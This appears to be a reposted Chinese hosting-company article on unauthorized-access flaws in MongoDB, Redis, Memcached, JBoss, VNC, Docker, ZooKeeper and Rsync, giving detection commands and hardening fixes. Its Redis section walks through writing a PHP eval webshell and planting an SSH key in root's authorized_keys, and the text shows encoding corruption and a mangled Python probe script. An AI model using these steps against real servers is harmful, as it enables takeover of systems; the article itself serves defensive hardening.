未授权访问漏洞有何影响,常见的有哪些�

Admin 2021-12-23 群英技术资�

    未授权访问漏洞有何影响?一些朋友对于未授权访问漏洞不是很了解,未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。因此,做好防范是很重要的,下面我们来了解一下常见的未授权访问漏洞类型,对大家做好防范会有一定的帮助�

一、MongoDB 未授权访问漏�

    漏洞信息

    (1) 漏洞简述开� MongoDB 服务时若不添加任何参数默认是没有权限验证的而且可以远程访问数据库登录的用户无需密码即可通过默认端口 27017 对数据库进行增、删、改、查等高危操作。刚安装完毕时MongoDB 都默认有一� admin 数据库此� admin 数据库为空没有记录权限相关的信息。当 admin.system.users 一个用户都没有时即� MongoDB 启动时添加了 –auth 参数还是可以做任何操作不管是否以 –auth 参数启动直到� admin.system.users 中添加了一个用户�

    (2) 风险等级高风险�

    (3) 漏洞编号无�

    (4) 影响范围MongoDB 数据库�

    检测方�

    可以自己编制相应脚本或利用专用工具检测也可以查看配置文件

    (1) 检测是否仅监听 127.0.0.1

--bind_ip 127.0.0.1
or
vim /etc/mongodb.conf
bind_ip = 127.0.0.1

    (2) 检测是否开� auth 认证

mongod --auth
or
vim /etc/mongodb.conf
auth = true

    修复方法

    (1) � MongoDB 添加认证

    � MongoDB 启动时添� -auth 参数�

    � � MongoDB 添加用户

use admin # 使用 admin �
db.addUser“用户名� “密码�# 添加用户名、密�
db.auth“用户名�,“密码�# 验证是否添加成功返回 1 说明成功�

    (2) 禁用 HTTP � REST 端口

    MongoDB 自身带有一� HTTP 服务并支� REST 接口。在 2.6 版本以后这些接口默认关闭。MongoDB 默认会使用默认端口监� Web 服务一般不需要通过 Web 方式进行远程管理建议禁用。修改配置文件或在启动时选择 -nohttpinterface 参数 nohttpinterface = false�

    (3) 限制绑定 IP

    启动时加入参�

--bind_ip 127.0.0.1

    或在 /etc/mongodb.conf 文件中添加以下内�

bind_ip = 127.0.0.1

二、Redis 未授权访问漏�

    漏洞信息

    (1) 漏洞简述Redis 是一个高性能� Key � Value 数据库。Redis 的出现很大程度上弥补� memcached 这类 Key/Value 存储的不足在部分场合可以对关系数据库起到很好的补充作用。Redis 默认情况下会绑定� 0.0.0.0:6379这样会将 Redis 服务暴露到公网上。在没有开启认证的情况下会导致任意用户在可以访问目标服务器的情况下未经授权就访问到 Redis 以及读取 Redis 的数据。攻击者在未授权访� Redis 的情况下可以利用 Redis 的相关方法成功地� Redis 服务器上写入公钥进而可以使用对应私钥直接登录目标服务器�

    (2) 风险等级高风险�

    (3) 漏洞编号无�

    (4) 影响范围Redis 数据库�

    检测方�

    先用 nmap 扫描查看端口开放情况发现开放的 6379 端口� Redis 的默认端�

Nmap -A -p 6379 --script redis-info 192.168.10.153

    Nmap 扫描后发现主机的 6379 端口对外开放可以通过 Redis 客户端进行连接测试是否存在未授权访问漏洞具体命令如下�

./redis-cli -h 192.168.10.153
Info

    就可以看� Redis 的版本和服务器上内核的版本信息也可以 del key 删除数据在网站写入木马写� SSH 公钥或者在 crontab 里写定时任务反弹 shell 等�

    (1) 网站写码

    � 先用客户端连接服务器� redis 服务

redis-cli.exe -h 目标IP

    � 连接后设置目�

config set dir /var/www/html此路径是服务器端 Web 网站的目�

    � 设置要写入的文件�

config set dbfilename redis88.php

    � 设置要写入的内容

set webshell "<?php @eval($_POST['123']); ?>"

    � 保存

save

    � 保存后用菜刀连接此木马得� webshell�

    (2) 结合 SSH 免密码登�

    � 先在本地建个 ssh 的密�

ssh-keygen-trsa

    � 将公钥的内容写到一个文本中命令如下

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt

    注意写到文件中时一定要在前面加几行后面加几行�

    � 将里面的内容写入远程� Redis 服务器上并且设置� Key � test命令如下

cat test.txt | redis -cli -h <hostname> -x set test

    � 登录远程服务器可以看到公钥已经添加到 Redis 的服务器上了命令如下

redis-cli -h <hostname>
keys *get test

    � 随后就是最关键的了Redis 有个 save 命令save 命令执行一个同步保存操作将当前 Redis 实例的所有数据快照snapshot� RDB 文件的形式保存到硬盘。所以save 命令就可以将 test 里的公钥保存� /root/.ssh 下要有权限�

    修改保存的路径为

config set dir "/root/.ssh"

    修改文件名为

config set dbfilename "authorized_keys"

    保存�

    � 测试一�

ssh 用户名@<IP地址>

    实现免密码成功登陆�

    修复方法

    (1) 设置 Redis 访问密码� redis.conf 中找� “requirepass� 字段在后面填上强口令redis 客户端也需要此密码来访� redis 服务�

    (2) 配置 bind 选项限定可以连接 Reids 服务器的 IP并修改默认端� 6379�

    (3) 重启 Redis 服务�

    (4) 清理系统中存在的后门木马�

三、Memcached 未授权访问漏洞CVE-2013-7239

    漏洞信息

    (1) 漏洞简述Memcached 是一套分布式高速缓存系统。它� Key � Value 的形式将数据存储在内存中。这些数据通常是会被频繁地应用、读取的。正因为内存中数据的读取速度远远大于硬盘的读取速度所以可以用来加速应用的访问。由� Memcached 的安全设计缺陷客户端连接 Memcached 服务器后无需认证就可读取、修改服务器缓存内容�

    (2) 风险等级高风险�

    (3) 漏洞编号CVE-2013-7239 �

    (4) 影响范围Memcached 全版本�

    检测方�

    登录机器执行 netstat -an | more 命令查看端口监听情况。回� 0.0.0.0:1121111211 表示在所有网卡进行监听存� Memcached 未授权访问漏洞�

telnet <target> 11211
or
nc -vv <target> 11211

    提示连接成功表示漏洞存在�

    使用端口扫描工具 nmap 进行远程扫描

nmap -sV -p11211 --script memcached-info <target>

    修复方法

    (1) 配置访问控制。建议用户不要将服务发布到互联网上以防被黑客利用而可以通过安全组规则或 Iptables 配置访问控制规则只允许内部必需的用户地址访问命令如下

iptables -A INPUT -p tcp -s 192.168.0.2 --dport 11211 -j ACCEPT

    (2) bind 指定监听 IP。如� Memcached 没有在外网开放的必要可在 Memcached 启动时指定绑定的 IP 地址� 127.0.0.1。例�

memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11211 -c 1024 -P /tmp/memcached.pid

    (3) 最小化权限运行。使用普通权限账号运行以下指� memcached 用户运行

memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11211 -c 1024 -P /tmp/memcached.pid

    (4) 修改默认端口。修改默� 11211 监听端口� 11222 端口

memcached -d -m 1024 -u memcached -l 127.0.0.1 -p 11222 -c 1024 -P /tmp/memcached.pid

    (5) 备份数据。为避免数据丢失升级前应做好备份或建立硬盘快照�

四、JBOSS 未授权访问漏�

    漏洞信息

    (1) 漏洞简述JBOSS 企业应用平台EAP� J2EE 应用的中间件平台。默认情况下访问 https://ip:8080/jmx-console 就可以浏� jboss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患�

    (2) 风险等级高风险�

    (3) 漏洞编号无�

    (4) 影响范围JBOSS 全版本�

    检测方�

    先用 nmap 扫描查看端口开放情况看是否开� JBOSS 端口。再使用漏洞测试工具测试 jmx 组件存在情况通过访问 https://ip:jboss端口/ 看是否能进入 jmx-console � web-console �

    修复方法

    JMX Console 安全配置

    � 找到 %JBOSS_HOME%/server/default/deploy/jmx-console.war/WEB-INF/jboss-web.xml 文件去掉下面这段 xml 文本的注释�

    � � jboss-web.xml 同级的目录下还有一个文� web.xml找到下面这段 xml 文本� GET � POST 两行注释掉同� security-constraint 整个部分取消注释, 不然存在head头绕过�

    � %JBOSS_HOME%\server\default\conf\props\jbossws-users.properties 中删除原始的 admin/admin添加新的用户名密码�

    � %JBOSS_HOME%\server\default\conf\props\jbossws-roles.properties 中定义新用户名所属角色。该文件定义的格式为用户� = 角色多个角色� �,� 隔开该文件默认为 admin 用户定义� JBossAdmin � HttpInvoker 这两个角色�

# A sample roles.properties file foruse with the UsersRolesLoginModule
kermit = JBossAdmin,HttpInvoker

五、VNC 未授权访问漏�

    漏洞信息

    (1) 漏洞简述VNC 是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基� UNXI � Linux 的免费开源软件由 VNC Server � VNC Viewer 两部分组成。VNC 默认端口号为 5900�5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制受控主机危害相当严重�

    (2) 风险等级高风险�

    (3) 漏洞编号无�

    (4) 影响范围VNC 全版本�

    检测方�

    使用 metasploit 进行批量检�

    (1) � kali 下运� msfconsolemsfconsole�

    (2) 调用 VNC 未授权检测模块use auxiliary/scanner/vnc/vnx_none_auth�

    (3) 显示有哪些选项show options�

    (4) 设置地址段set rhosts ip � 段�

    (5) 设置线程set threads 50�

    (6) 开始扫描run�

    修复方法

    (1) 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码�

    (2) 以最小权限的普通用户身份运行操作系统�

六、Docker 未授权访问漏�

    漏洞信息

    (1) 漏洞简述Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker 存在问题的版本分别为 1.3 � 1.6因为权限控制等问题导致可以脱离容器拿到宿主机权限�

    (2) 风险等级高风险�

    (3) 漏洞编号无�

    (4) 影响范围Docker 1.3、Docker 1.6�

    检测方�

    先用 nmap 扫描查看端口开放情况�2375 � docker 端口如果存在漏洞会有以下情况url 输入 ip:2375/version 就会列出基本信息也可以执行目标服务器容器命令� container、image 等�

    修复方法

    (1) 使用 TLS 认证�

    (2) 网络访问控制Network Access Control

七、ZooKeeper 未授权访问漏�

    漏洞信息

    (1) 漏洞简述ZooKeeper 是一个分布式的开放源码的分布式应用程序协调服务是 Google � Chubby 一个开源的实现� Hadoop � Hbase 的重要组件。它是一个为分布式应用提供一致性服务的软件提供的功能包括配置维护、域名服务、分布式同步、组服务等。ZooKeeper 默认开启在 2181 端口在未进行任何访问控制的情况下攻击者可通过执行 envi 命令获得系统大量的敏感信息包括系统名称Java 环境。这将导致任意用户在网络可达的情况下进行为未授权访问并读取数据甚� kill 服务�

    (2) 风险等级高风险�

    (3) 漏洞编号无�

    (4) 影响范围Zookeeper 全版本�

    检测方�

    (1) 通过 nmap 扫描开放了 2181 端口的主机�

    (2) 运行脚本通过 socket 连接 2181 端口并发� envi 命令若服务端返回的数据中包含 ZooKeeper 的服务运行环境信息即可证明存在未授权访问�

    检测脚�

# coding=utf-8
 import socketimport sys 
def check(ip, port, timeout, cmd):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send(cmd)
        data = s.recv(1024)
        s.close()        print data    except:        passdef main():
    if len(sys.argv) < 3:
        exit()
    ip = sys.argv[1]
    cmd = sys.argv[2]    # envi
    # dump
    # reqs
    # ruok
    # stat
    check(ip, 2181, 3, cmd) 
if __name__ == '__main__':
    main()

    修复方法

    (1) 修改 ZooKeeper 默认端口,采用其他端口服务,配置服务来源地址限制策略�

    (2) 增加 ZooKeeper 的认证配置�

八、Rsync 未授权访问漏�

    漏洞信息

    (1) 漏洞简述:Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837�

    (2) 风险等级:高风险�

    (3) 漏洞编号:无�

    (4) 影响范围:Rsync 全版本�

    检测方�

    nmap 扫描:nmap ip -p837�

    列出当前目录,显示用户:rsync ip�

    如果是root,可以下载任意文件并上传文件�

    修复方法

    (1) 隐藏 module 信息:修改配置文� list =false�

    (2) 权限控制:不需要写入权限的 module 的设置为只读 Read only = true�

    (3) 网络访问控制:使用安全组策略或白名单限制,只允许必要访问的主机访问:hosts allow = 123.123.123.123�

    (4) 账户认证:只允许指定的用户利用指定的密码使用 rsync 服务�

    (5) 数据加密传输:Rsync 默认没有直接支持加密传输,如果需� Rsync 同步重要性很高的数据,可以使� ssh�

    现在大家对于未授权访问漏洞的影响应该都了解了吧,上述检测和修复方法有一定的参考家价值,需要的朋友可以了解看看,希望大家阅读完这篇文章能有所收获。最后,想要了解更多大家可以关注群英网络其它相关文章�

文本转载自PHP中文�

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:[email protected]进行举报,并提供相关证据,查实之后,将立刻删除涉嫌侵权内容�

猜你喜欢

群英网络开启智能安全云计算之旅

注册领取新人大礼�
专业资深工程师驻�
7X24小时快速响�
一站式无忧技术支�
免费备案服务

联系我们

24小时售后 24小时售后TEL�0668-2555666 售前咨询TEL�400-678-4567 投诉建议TEL�0668-2555999 投诉建议邮箱:t[email protected] 信息安全TEL�0668-2555118 域名空间客服 公司总机�0668-2555555 公司传真�0668-2555000
免费拨打  400-678-4567
免费拨打  400-678-4567 免费拨打 400-678-4567 � 0668-2555555
在线客服
微信公众号
返回顶部
返回顶部 返回顶部